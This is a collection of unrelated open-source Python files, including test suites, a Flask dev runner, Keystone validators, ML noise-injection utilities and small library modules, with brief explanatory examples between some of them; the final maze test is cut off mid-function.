12_browser_automation_selenium/lectures/3_using_chrome_in_scraping_code/locators/quotes_page_locators.py | gdia/The-Complete-Python-Course | MIT

```python
class QuotesPageLocators:
    QUOTE = "div.quote"
```
rses/src/rses_run.py | iScrE4m/RSES | MIT

```python
#!/usr/bin/env python3
# coding=utf-8
"""Run - mainly for development"""
from flask_app.app import app

port = app.config['PORT']
app.run(host='0.0.0.0', port=port, debug=True)
```
test/test_algs.py | callamartyn/example | Apache-2.0

```python
import numpy as np

from example import algs


def test_pointless_sort():
    # generate random vector of length 10
    x = np.random.rand(10)

    # check that pointless_sort always returns [1,2,3]
    assert np.array_equal(algs.pointless_sort(x), np.array([1, 2, 3]))

    # generate a new random vector of length 10
    x = np.random.rand(10)

    # check that pointless_sort still returns [1,2,3]
    assert np.array_equal(algs.pointless_sort(x), np.array([1, 2, 3]))


def test_bubblesort():
    # Some edge cases to think about: (1) does the code handle 0-element
    # arrays without failing, (2) does it handle characters?
    x = np.array([1, 2, 4, 0, 1])
    empty = []
    single = [11]
    dup = [3, 12, 7, 7, -6, 9]
    odd = np.random.rand(11)
    even = np.random.rand(12)

    # test that bubblesort is sorting array x correctly
    assert np.array_equal(algs.bubblesort(x), [0, 1, 1, 2, 4])

    # testing additional edge cases: empty, single element, duplicated
    # element, odd and even length vectors
    assert np.array_equal(algs.bubblesort(empty), [])
    assert np.array_equal(algs.bubblesort(single), [11])
    assert np.array_equal(algs.bubblesort(dup), [-6, 3, 7, 7, 9, 12])
    algs.bubblesort(odd)
    assert odd[0] < odd[10]
    algs.bubblesort(even)
    assert even[0] < even[11]


def test_quicksort():
    x = np.array([1, 2, 4, 0, 1])
    empty = []
    single = [11]
    dup = [3, 12, 7, 7, -6, 9]
    odd = np.random.rand(11)
    even = np.random.rand(12)

    # test that quicksort is sorting array x correctly
    assert np.array_equal(algs.quicksort(x), [0, 1, 1, 2, 4])

    # testing additional edge cases: empty, single element, duplicated
    # element, odd and even length vectors
    assert np.array_equal(algs.quicksort(empty), [])
    assert np.array_equal(algs.quicksort(single), [11])
    assert np.array_equal(algs.quicksort(dup), [-6, 3, 7, 7, 9, 12])
    algs.quicksort(odd)
    assert odd[0] < odd[10]
    algs.quicksort(even)
    assert even[0] < even[11]
```
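The `bubblesort` and `quicksort` implementations under test live in `example/algs.py` and are not shown here. For reference, a minimal in-place bubble sort that would satisfy these tests, covering both call styles they rely on (return value and in-place mutation); this is an illustrative assumption, not the repository's actual code:

```python
def bubblesort(x):
    # in-place bubble sort; also returns the sequence so both the
    # return-value asserts and the in-place-mutation asserts above work
    n = len(x)
    for i in range(n):
        for j in range(n - 1 - i):
            if x[j] > x[j + 1]:
                x[j], x[j + 1] = x[j + 1], x[j]
    return x


print(bubblesort([3, 12, 7, 7, -6, 9]))  # [-6, 3, 7, 7, 9, 12]
```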
fabio/test/test_all.py | picca/fabio | Apache-2.0

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Project: Fable Input Output
# https://github.com/silx-kit/fabio
#
# Copyright (C) European Synchrotron Radiation Facility, Grenoble, France
#
# Principal author: Jérôme Kieffer (Jerome.Kieffer@ESRF.eu)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
"""Test suite for all fabio modules."""

from __future__ import print_function, with_statement, division, absolute_import

import sys
import logging
import unittest

logger = logging.getLogger(__name__)

from . import testfabioimage
from . import testfilenames
from . import test_file_series
from . import test_filename_steps
from . import testheadernotsingleton
from . import testopenheader
from . import testopenimage
from . import test_flat_binary
from . import testcompression
from . import test_nexus
from . import testfabioconvert
from . import test_failing_files
from . import test_formats
from . import test_image_convert
from . import test_tiffio
from . import test_frames
from . import test_fabio
from . import codecs


def suite():
    testSuite = unittest.TestSuite()
    testSuite.addTest(testfabioimage.suite())
    testSuite.addTest(testfilenames.suite())
    testSuite.addTest(test_file_series.suite())
    testSuite.addTest(test_filename_steps.suite())
    testSuite.addTest(testheadernotsingleton.suite())
    testSuite.addTest(testopenheader.suite())
    testSuite.addTest(testopenimage.suite())
    testSuite.addTest(test_flat_binary.suite())
    testSuite.addTest(testcompression.suite())
    testSuite.addTest(test_nexus.suite())
    testSuite.addTest(testfabioconvert.suite())
    testSuite.addTest(test_failing_files.suite())
    testSuite.addTest(test_formats.suite())
    testSuite.addTest(test_image_convert.suite())
    testSuite.addTest(test_tiffio.suite())
    testSuite.addTest(test_frames.suite())
    testSuite.addTest(test_fabio.suite())
    testSuite.addTest(codecs.suite())
    return testSuite


if __name__ == '__main__':
    runner = unittest.TextTestRunner()
    if not runner.run(suite()).wasSuccessful():
        sys.exit(1)
```
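The `suite()` function above simply aggregates each test module's own `suite()` into one `unittest.TestSuite`. The same aggregation pattern in a self-contained sketch; the `SmokeTest` case is a placeholder, not part of fabio:

```python
import unittest


class SmokeTest(unittest.TestCase):
    def test_truth(self):
        self.assertTrue(True)


def suite():
    # aggregate individual TestSuites into one, mirroring fabio's test_all.suite()
    testSuite = unittest.TestSuite()
    testSuite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(SmokeTest))
    return testSuite


result = unittest.TextTestRunner(verbosity=0).run(suite())
print(result.wasSuccessful())  # True
```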
circuitpython_typing/__init__.py | prplz/Adafruit_CircuitPython_Typing | MIT

```python
# SPDX-FileCopyrightText: Copyright (c) 2022 Dan Halbert for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`circuitpython_typing`
================================================================================

Types needed for type annotation that are not in `typing`

* Author(s): Alec Delaney, Dan Halbert, Randy Hudson
"""

__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_Typing.git"

from typing import Union, Optional

# Protocol was introduced in Python 3.8.
try:
    from typing import Protocol
except ImportError:
    from typing_extensions import Protocol

from array import array

ReadableBuffer = Union[bytes, bytearray, memoryview, array]
"""Classes that implement the readable buffer protocol

* `bytes`
* `bytearray`
* `memoryview`
* `array.array`
"""

WriteableBuffer = Union[bytearray, memoryview, array]
"""Classes that implement the writeable buffer protocol

* `bytearray`
* `memoryview`
* `array.array`
"""


class ByteStream(Protocol):
    """Protocol for basic I/O operations on a byte stream.

    Classes which implement this protocol include

    * `io.BytesIO`
    * `io.FileIO` (for a file open in binary mode)
    * `busio.UART`
    * `usb_cdc.Serial`
    """

    # Should be `, /)`, but not available in Python 3.7.
    def read(self, count: Optional[int] = None) -> Optional[bytes]:
        """Read ``count`` bytes from the stream.

        If ``count`` bytes are not immediately available,
        or if the parameter is not specified in the call,
        the outcome is implementation-dependent.
        """
        ...

    # Should be `, /)`, but not available in Python 3.7.
    def write(self, buf: ReadableBuffer) -> Optional[int]:
        """Write the bytes in ``buf`` to the stream."""
        ...
```
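`ByteStream` is a structural type: any class with compatible `read`/`write` methods satisfies it, with no inheritance required. A self-contained sketch of that idea, restating the protocol and adding `typing.runtime_checkable` (which the original module does not use) so the structural match can be observed at runtime:

```python
import io
from typing import Optional, Protocol, runtime_checkable


@runtime_checkable
class ByteStream(Protocol):
    """Structural type: any object with matching read/write qualifies."""

    def read(self, count: Optional[int] = None) -> Optional[bytes]:
        ...

    def write(self, buf) -> Optional[int]:
        ...


stream = io.BytesIO(b"abc")
# BytesIO never inherits from ByteStream, but satisfies it structurally
print(isinstance(stream, ByteStream))  # True
```

Note that `runtime_checkable` only checks for the presence of the protocol's methods, not their signatures.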
cterasdk/core/files/fetch_resources_param.py | CTERA-Networks/ctera-python-sdk | Apache-2.0

```python
from ...common import Object


class FetchResourcesParam(Object):
    def __init__(self):
        self._classname = 'FetchResourcesParam'
        self.start = 0
        self.limit = 100

    def increment(self):
        self.start = self.start + self.limit


class FetchResourcesParamBuilder:
    def __init__(self):
        self.param = FetchResourcesParam()

    def root(self, root):
        self.param.root = root  # pylint: disable=attribute-defined-outside-init
        return self

    def depth(self, depth):
        self.param.depth = depth  # pylint: disable=attribute-defined-outside-init
        return self

    def include_deleted(self):
        self.param.includeDeleted = True  # pylint: disable=attribute-defined-outside-init
        return self  # return self so this method chains like the others

    def build(self):
        return self.param
```
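`FetchResourcesParamBuilder` composes a paging parameter object whose `increment()` advances `start` by `limit`. A self-contained sketch of that paging behavior, with a trivial stand-in for cterasdk's `Object` base class (an assumption made here so the snippet runs on its own):

```python
class Object:
    """Trivial stand-in for cterasdk's Object base class (assumption)."""


class FetchResourcesParam(Object):
    def __init__(self):
        self._classname = 'FetchResourcesParam'
        self.start = 0
        self.limit = 100

    def increment(self):
        # advance the paging window by one page
        self.start = self.start + self.limit


param = FetchResourcesParam()
pages = []
for _ in range(3):  # fetch three pages of up to `limit` items each
    pages.append((param.start, param.limit))
    param.increment()

print(pages)  # [(0, 100), (100, 100), (200, 100)]
```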
test/test_cmdline_main.py | sthagen/pyinstrument | BSD-3-Clause

```python
from pathlib import Path

import pytest

from pyinstrument.__main__ import main
from pyinstrument.renderers.base import FrameRenderer

from .util import BUSY_WAIT_SCRIPT

fake_renderer_instance = None


class FakeRenderer(FrameRenderer):
    def __init__(self, time=None, **kwargs):
        self.time = time
        super().__init__(**kwargs)
        global fake_renderer_instance
        fake_renderer_instance = self
        print("instance")

    def default_processors(self):
        """
        Return a list of processors that this renderer uses by default.
        """
        return []

    def render(self, session) -> str:
        return ""


def test_renderer_option(monkeypatch: pytest.MonkeyPatch, tmp_path: Path):
    (tmp_path / "test_program.py").write_text(BUSY_WAIT_SCRIPT)
    monkeypatch.setattr(
        "sys.argv",
        [
            "pyinstrument",
            "-r",
            "test.test_cmdline_main.FakeRenderer",
            "-p",
            "time=percent_of_total",
            "test_program.py",
        ],
    )
    monkeypatch.chdir(tmp_path)

    global fake_renderer_instance
    fake_renderer_instance = None

    main()

    assert fake_renderer_instance is not None
    assert fake_renderer_instance.time == "percent_of_total"


def test_json_renderer_option(monkeypatch: pytest.MonkeyPatch, tmp_path: Path):
    (tmp_path / "test_program.py").write_text(BUSY_WAIT_SCRIPT)
    monkeypatch.setattr(
        "sys.argv",
        [
            "pyinstrument",
            "-r",
            "test.test_cmdline_main.FakeRenderer",
            "-p",
            'processor_options={"some_option": 44}',
            "test_program.py",
        ],
    )
    monkeypatch.chdir(tmp_path)

    global fake_renderer_instance
    fake_renderer_instance = None

    main()

    assert fake_renderer_instance is not None
    assert fake_renderer_instance.processor_options["some_option"] == 44


def test_dotted_renderer_option(monkeypatch: pytest.MonkeyPatch, tmp_path: Path):
    (tmp_path / "test_program.py").write_text(BUSY_WAIT_SCRIPT)
    monkeypatch.setattr(
        "sys.argv",
        [
            "pyinstrument",
            "-r",
            "test.test_cmdline_main.FakeRenderer",
            "-p",
            "processor_options.other_option=13",
            "test_program.py",
        ],
    )
    monkeypatch.chdir(tmp_path)

    global fake_renderer_instance
    fake_renderer_instance = None

    main()

    assert fake_renderer_instance is not None
    assert fake_renderer_instance.processor_options["other_option"] == 13
```
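Each test above swaps out `sys.argv` via pytest's `monkeypatch` fixture before calling `main()`. The same pattern is available in the standard library with `unittest.mock`; in this minimal sketch, `main()` is a stand-in that echoes its arguments, not pyinstrument's real entry point:

```python
import sys
from unittest import mock


def main():
    # stand-in CLI entry point that just echoes its arguments
    # (assumption: the real pyinstrument main reads sys.argv similarly)
    return sys.argv[1:]


# sys.argv is restored automatically when the context manager exits
with mock.patch.object(sys, "argv", ["pyinstrument", "-r", "FakeRenderer"]):
    args = main()

print(args)  # ['-r', 'FakeRenderer']
```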
keystone/common/validation/validators.py | ferag/keystone | Apache-2.0

```python
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Internal implementation of request body validating middleware."""

import re

import jsonschema
from oslo_config import cfg
from oslo_log import log
import six

from keystone import exception
from keystone.i18n import _

CONF = cfg.CONF
LOG = log.getLogger(__name__)


# TODO(rderose): extend schema validation and add this check there
def validate_password(password):
    pattern = CONF.security_compliance.password_regex
    if pattern:
        if not isinstance(password, six.string_types):
            detail = _("Password must be a string type")
            raise exception.PasswordValidationError(detail=detail)
        try:
            if not re.match(pattern, password):
                pattern_desc = (
                    CONF.security_compliance.password_regex_description)
                raise exception.PasswordRequirementsValidationError(
                    detail=pattern_desc)
        except re.error:
            msg = ("Unable to validate password due to invalid regular "
                   "expression - password_regex: %s")
            LOG.error(msg, pattern)
            detail = _("Unable to validate password due to invalid "
                       "configuration")
            raise exception.PasswordValidationError(detail=detail)


class SchemaValidator(object):
    """Resource reference validator class."""

    validator_org = jsonschema.Draft4Validator

    def __init__(self, schema):
        # NOTE(lbragstad): If at some point in the future we want to extend
        # our validators to include something specific we need to check for,
        # we can do it here. Nova's V3 API validators extend the validator to
        # include `self._validate_minimum` and `self._validate_maximum`. This
        # would be handy if we needed to check for something the jsonschema
        # didn't by default. See the Nova V3 validator for details on how this
        # is done.
        validators = {}
        validator_cls = jsonschema.validators.extend(self.validator_org,
                                                     validators)
        fc = jsonschema.FormatChecker()
        self.validator = validator_cls(schema, format_checker=fc)

    def validate(self, *args, **kwargs):
        try:
            self.validator.validate(*args, **kwargs)
        except jsonschema.ValidationError as ex:
            # NOTE: For whole OpenStack message consistency, this error
            # message has been written in a format consistent with WSME.
            if ex.path:
                # NOTE(lbragstad): Here we could think about using iter_errors
                # as a method of providing invalid parameters back to the
                # user.
                # TODO(lbragstad): If the value of a field is confidential or
                # too long, then we should build the masking in here so that
                # we don't expose sensitive user information in the event it
                # fails validation.
                path = '/'.join(map(six.text_type, ex.path))
                detail = _("Invalid input for field '%(path)s': "
                           "%(message)s") % {'path': path,
                                             'message': six.text_type(ex)}
            else:
                detail = six.text_type(ex)
            raise exception.SchemaValidationError(detail=detail)
```
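`validate_password` rejects non-string input, matches the operator-configured regex, and converts a malformed regex into a configuration error rather than a user error. A standard-library-only sketch of that flow, with the oslo.config `CONF` object and keystone's exception classes replaced by simple assumptions (the default pattern here is purely illustrative):

```python
import re


class PasswordValidationError(ValueError):
    """Stand-in for keystone's exception type (assumption)."""


def validate_password(password, pattern=r"^(?=.*\d)(?=.*[a-z]).{8,}$"):
    # reject non-string input before touching the regex
    if not isinstance(password, str):
        raise PasswordValidationError("Password must be a string type")
    try:
        matched = re.match(pattern, password)
    except re.error:
        # a bad operator-supplied regex is a configuration error, not a user error
        raise PasswordValidationError(
            "Unable to validate password due to invalid configuration")
    if not matched:
        raise PasswordValidationError(
            "Password does not meet the configured requirements")


validate_password("s3cretpass")  # passes silently
```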
tests/test_basic.py | supwest/stockfighter | MIT

```python
import unittest
import os

from .context import stockfighter
from stockfighter import trader

from selenium import webdriver
from selenium.webdriver.common.keys import Keys


class StockfighterAPITest(unittest.TestCase):
    def setUp(self):
        self.test_trader = stockfighter.trader.Trader()

    def test_trader_driver_is_firefox(self):
        self.assertEqual(self.test_trader.driver.name, "firefox")

    def test_trader_checks_page_request_return_code(self):
        status = self.test_trader._check_page_status('https://www.stockfighter.io/')
        self.assertIn(status, [True, False])

    def test_trader_gets_page(self):
        self.test_trader.driver.get('https://www.stockfighter.io/')
        self.assertIn("Stockfighter", self.test_trader.driver.title)

    def test_trader_checks_api_is_up(self):
        response = self.test_trader._check_api_status()
        self.assertIn(response, [True, False])

    def test_trader_logs_in(self):
        self.test_trader._login()
        self.assertEqual('https://www.stockfighter.io/ui/account',
                         self.test_trader.driver.current_url)

    def test_trader_gets_trading_account(self):
        self.test_trader._get_trading_account("Chock A Block")
        self.assertEqual(self.test_trader.account, "MSB81053722")

    def tearDown(self):
        self.test_trader.driver.close()
```
9c3ceef3f0dfd436a5b1789bb937b4fbcbbbae90 | 7,564 | py | Python | candle/noise_utils.py | hyoo/candle_lib | 33fe91879a09035fab1b94361c0d65d4595e8d0d | [
"MIT"
] | null | null | null | candle/noise_utils.py | hyoo/candle_lib | 33fe91879a09035fab1b94361c0d65d4595e8d0d | [
"MIT"
] | null | null | null | candle/noise_utils.py | hyoo/candle_lib | 33fe91879a09035fab1b94361c0d65d4595e8d0d | [
"MIT"
] | null | null | null | import random
import numpy as np
def add_noise_new(data, labels, params):
# new refactoring of the noise injection methods
# noise_mode sets the pattern of the noise injection
# cluster: apply to the samples and features defined by noise_samples and noise_features
# conditional : apply to features conditional on a threshold
#
# noise_type sets the form of the noise
# gaussian: Gaussian feature noise with noise_scale as std_dev
# uniform: Uniformly distributed noise on the interval [-noise_scale, noise_scale]
# label: Flip labels
if params["noise_injection"]:
if params["label_noise"]:
# check if we want noise correlated with a feature
if params["noise_correlated"]:
labels, y_noise_gen = label_flip_correlated(
labels,
params["label_noise"],
data,
params["feature_col"],
params["feature_threshold"],
)
# else add uncorrelated noise
else:
labels, y_noise_gen = label_flip(labels, params["label_noise"])
# check if noise is on for RNA-seq data
elif params["noise_gaussian"]:
data = add_gaussian_noise(data, 0, params["std_dev"])
elif params["noise_cluster"]:
data = add_cluster_noise(
data,
loc=0.0,
scale=params["std_dev"],
col_ids=params["feature_col"],
noise_type=params["noise_type"],
row_ids=params["sample_ids"],
y_noise_level=params["label_noise"],
)
elif params["noise_column"]:
data = add_column_noise(
data,
0,
params["std_dev"],
col_ids=params["feature_col"],
noise_type=params["noise_type"],
)
return data, labels
def add_noise(data, labels, params):
# put all the logic under the add_noise switch
if params["add_noise"]:
if params["label_noise"]:
# check if we want noise correlated with a feature
if params["noise_correlated"]:
labels, y_noise_gen = label_flip_correlated(
labels,
params["label_noise"],
data,
params["feature_col"],
params["feature_threshold"],
)
# else add uncorrelated noise
else:
labels, y_noise_gen = label_flip(labels, params["label_noise"])
# check if noise is on for RNA-seq data
elif params["noise_gaussian"]:
data = add_gaussian_noise(data, 0, params["std_dev"])
elif params["noise_cluster"]:
data = add_cluster_noise(
data,
loc=0.0,
scale=params["std_dev"],
col_ids=params["feature_col"],
noise_type=params["noise_type"],
row_ids=params["sample_ids"],
y_noise_level=params["label_noise"],
)
elif params["noise_column"]:
data = add_column_noise(
data,
0,
params["std_dev"],
col_ids=params["feature_col"],
noise_type=params["noise_type"],
)
return data, labels
def label_flip(y_data_categorical, y_noise_level):
flip_count = 0
for i in range(0, y_data_categorical.shape[0]):
if random.random() < y_noise_level:
flip_count += 1
for j in range(y_data_categorical.shape[1]):
y_data_categorical[i][j] = int(not y_data_categorical[i][j])
y_noise_generated = float(flip_count) / float(y_data_categorical.shape[0])
print("Uncorrelated label noise generation:\n")
print(
"Labels flipped on {} samples out of {}: {:06.4f} ({:06.4f} requested)\n".format(
flip_count, y_data_categorical.shape[0], y_noise_generated, y_noise_level
)
)
return y_data_categorical, y_noise_generated
def label_flip_correlated(
    y_data_categorical, y_noise_level, x_data, col_ids, threshold
):
    for col_id in col_ids:
        flip_count = 0
        for i in range(0, y_data_categorical.shape[0]):
            if x_data[i][col_id] > threshold:
                if random.random() < y_noise_level:
                    print(i, y_data_categorical[i][:])
                    flip_count += 1
                    for j in range(y_data_categorical.shape[1]):
                        y_data_categorical[i][j] = int(not y_data_categorical[i][j])
                    print(i, y_data_categorical[i][:])
        y_noise_generated = float(flip_count) / float(y_data_categorical.shape[0])
        print("Correlated label noise generation for feature {:d}:\n".format(col_id))
        print(
            "Labels flipped on {} samples out of {}: {:06.4f} ({:06.4f} requested)\n".format(
                flip_count,
                y_data_categorical.shape[0],
                y_noise_generated,
                y_noise_level,
            )
        )
    return y_data_categorical, y_noise_generated
# Add simple Gaussian noise to RNA seq values, assume normalized x data
def add_gaussian_noise(x_data, loc=0.0, scale=0.5):
    print("added gaussian noise")
    train_noise = np.random.normal(loc, scale, size=x_data.shape)
    x_data = x_data + train_noise
    return x_data
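A quick check of the additive-noise behaviour, with a fixed seed so the draw is reproducible (plain numpy, no project code assumed):

```python
import numpy as np

np.random.seed(0)
x = np.zeros((2, 3))
noise = np.random.normal(0.0, 0.5, size=x.shape)  # loc=0.0, scale=0.5 as above
noisy = x + noise

# shape is preserved and the data actually moved
assert noisy.shape == x.shape
assert not np.allclose(noisy, x)
```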
# Add simple Gaussian noise to a list of RNA seq values, assume normalized x data
def add_column_noise(x_data, loc=0.0, scale=0.5, col_ids=[0], noise_type="gaussian"):
    for col_id in col_ids:
        print("added", noise_type, "noise to column ", col_id)
        print(x_data[:, col_id].T)
        if noise_type == "gaussian":
            train_noise = np.random.normal(loc, scale, size=x_data.shape[0])
        elif noise_type == "uniform":
            train_noise = np.random.uniform(-1.0 * scale, scale, size=x_data.shape[0])
        print(train_noise)
        x_data[:, col_id] = 1.0 * x_data[:, col_id] + 1.0 * train_noise.T
        print(x_data[:, col_id].T)
    return x_data
# Add noise to a list of RNA seq values, for a fraction of samples; assume normalized x data
def add_cluster_noise(
    x_data,
    loc=0.0,
    scale=0.5,
    col_ids=[0],
    noise_type="gaussian",
    row_ids=[0],
    y_noise_level=0.0,
):
    # loop over all samples
    num_samples = len(row_ids)
    flip_count = 0
    for row_id in row_ids:
        # only perturb a fraction of the samples
        if random.random() < y_noise_level:
            flip_count += 1
            for col_id in col_ids:
                print("added", noise_type, "noise to row, column ", row_id, col_id)
                print(x_data[row_id, col_id])
                if noise_type == "gaussian":
                    train_noise = np.random.normal(loc, scale)
                elif noise_type == "uniform":
                    train_noise = np.random.uniform(-1.0 * scale, scale)
                print(train_noise)
                x_data[row_id, col_id] = (
                    1.0 * x_data[row_id, col_id] + 1.0 * train_noise
                )
                print(x_data[row_id, col_id])
    y_noise_generated = float(flip_count) / float(num_samples)
    print(
        "Noise added to {} samples out of {}: {:06.4f} ({:06.4f} requested)\n".format(
            flip_count, num_samples, y_noise_generated, y_noise_level
        )
    )
    return x_data
| 37.261084 | 94 | 0.571655 | 975 | 7,564 | 4.175385 | 0.118974 | 0.029477 | 0.070744 | 0.041268 | 0.767379 | 0.743552 | 0.679686 | 0.653648 | 0.63547 | 0.610906 | 0 | 0.01439 | 0.329323 | 7,564 | 202 | 95 | 37.445545 | 0.788094 | 0.135907 | 0 | 0.647799 | 0 | 0.018868 | 0.128646 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044025 | false | 0 | 0.012579 | 0 | 0.100629 | 0.100629 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
9c3ecf6bb488053744cb6d6b269e92b05ceaf49c | 249 | py | Python | Strings/Capitalize!.py | Code-With-Aagam/python-hackerrank | 270c75cf2ca30916183c7fe5ca130a64c7a8ed6d | [
"MIT"
] | 3 | 2022-03-05T15:38:26.000Z | 2022-03-09T13:39:30.000Z | Strings/Capitalize!.py | Code-With-Aagam/python-hackerrank | 270c75cf2ca30916183c7fe5ca130a64c7a8ed6d | [
"MIT"
] | null | null | null | Strings/Capitalize!.py | Code-With-Aagam/python-hackerrank | 270c75cf2ca30916183c7fe5ca130a64c7a8ed6d | [
"MIT"
] | null | null | null | def capitalize(string):
# We can't use title() here, consider the case: "123name" -> "123Name", which isn't correct.
for substring in string.split():
string = string.replace(substring, substring.capitalize())
return string | 49.8 | 97 | 0.666667 | 31 | 249 | 5.354839 | 0.709677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030612 | 0.212851 | 249 | 5 | 98 | 49.8 | 0.816327 | 0.361446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
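The caveat in the comment is easy to verify directly: `str.title()` uppercases the first letter after any non-letter (so digits break it), while per-word `str.capitalize()` leaves a digit-led token alone. A small standalone check of both behaviours:

```python
def capitalize(string):
    # same per-word approach as the solution above
    for substring in string.split():
        string = string.replace(substring, substring.capitalize())
    return string

# title() would produce "123Name"; the per-word version does not
assert "123name".title() == "123Name"
assert capitalize("123name hello") == "123name Hello"
assert capitalize("hello world") == "Hello World"
```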
9c4c898411baa86dabf2cedad3099771b16206ac | 271 | py | Python | mainapp/migrations/0086_merge_20180824_1601.py | raeeska/rescuekerala | 649070cd051e0bf2ef54549c96493d5c4c5d89c9 | [
"MIT"
] | 1 | 2018-08-21T15:06:21.000Z | 2018-08-21T15:06:21.000Z | mainapp/migrations/0086_merge_20180824_1601.py | pranavmodx/rescuekerala | dd75a06b191b39ff4bdcd8e42d61c98a6509f052 | [
"MIT"
] | 1 | 2018-08-28T13:26:26.000Z | 2018-08-28T13:26:26.000Z | mainapp/migrations/0086_merge_20180824_1601.py | pranavmodx/rescuekerala | dd75a06b191b39ff4bdcd8e42d61c98a6509f052 | [
"MIT"
] | 5 | 2019-11-07T11:34:56.000Z | 2019-11-07T11:36:00.000Z | # Generated by Django 2.1 on 2018-08-24 10:31
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0084_auto_20180824_1426'),
('mainapp', '0085_auto_20180824_1511'),
]
operations = [
]
| 18.066667 | 47 | 0.649446 | 32 | 271 | 5.3125 | 0.8125 | 0.141176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.221154 | 0.232472 | 271 | 14 | 48 | 19.357143 | 0.596154 | 0.158672 | 0 | 0 | 1 | 0 | 0.265487 | 0.20354 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
9c5289c4fa797410f13bccf543aef70c24a99c61 | 545 | py | Python | lldb/test/API/lang/cpp/typeof/TestTypeOfDeclTypeExpr.py | mkinsner/llvm | 589d48844edb12cd357b3024248b93d64b6760bf | [
"Apache-2.0"
] | 2,338 | 2018-06-19T17:34:51.000Z | 2022-03-31T11:00:37.000Z | lldb/test/API/lang/cpp/typeof/TestTypeOfDeclTypeExpr.py | mkinsner/llvm | 589d48844edb12cd357b3024248b93d64b6760bf | [
"Apache-2.0"
] | 3,740 | 2019-01-23T15:36:48.000Z | 2022-03-31T22:01:13.000Z | lldb/test/API/lang/cpp/typeof/TestTypeOfDeclTypeExpr.py | mkinsner/llvm | 589d48844edb12cd357b3024248b93d64b6760bf | [
"Apache-2.0"
] | 500 | 2019-01-23T07:49:22.000Z | 2022-03-30T02:59:37.000Z | import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
@no_debug_info_test
def test(self):
self.expect_expr("int i; __typeof__(i) j = 1; j", result_type="typeof (i)", result_value="1")
self.expect_expr("int i; typeof(i) j = 1; j", result_type="typeof (i)", result_value="1")
self.expect_expr("int i; decltype(i) j = 1; j", result_type="decltype(i)", result_value="1")
| 36.333333 | 101 | 0.691743 | 83 | 545 | 4.289157 | 0.361446 | 0.078652 | 0.143258 | 0.143258 | 0.410112 | 0.410112 | 0.370787 | 0.370787 | 0.370787 | 0.370787 | 0 | 0.013187 | 0.165138 | 545 | 14 | 102 | 38.928571 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0.211009 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
9c5e49bf065cd64b31071ee824551c783e1a5116 | 1,453 | py | Python | tests/test_maze.py | RhysGrabany/maze-generator | be8c448fb8bd36c1a682224af087bab385516e7b | [
"MIT"
] | null | null | null | tests/test_maze.py | RhysGrabany/maze-generator | be8c448fb8bd36c1a682224af087bab385516e7b | [
"MIT"
] | null | null | null | tests/test_maze.py | RhysGrabany/maze-generator | be8c448fb8bd36c1a682224af087bab385516e7b | [
"MIT"
] | null | null | null | #!usr/bin/python3
import sys, os
sys.path.append(os.path.realpath(os.path.dirname(__file__)+"/.."))
from classes.maze import Maze, Cell
class TestingMaze:
def test_width(self):
maze = Maze(20, 5)
assert maze.getCols() == 20
def test_min_width(self):
maze = Maze(2,2)
assert maze.getCols() == 5
def test_height(self):
maze = Maze(5,50)
assert maze.getRows() == 50
def test_min_height(self):
maze = Maze(2,2)
assert maze.getRows() == 5
def test_maze_name(self):
maze = Maze(5,5)
assert maze.getName() == "MAZE_5x5"
def test_maze_get(self):
maze = Maze(5,5)
assert isinstance(maze[0][0], Cell)
def test_maze_set_name(self):
maze = Maze(5,5)
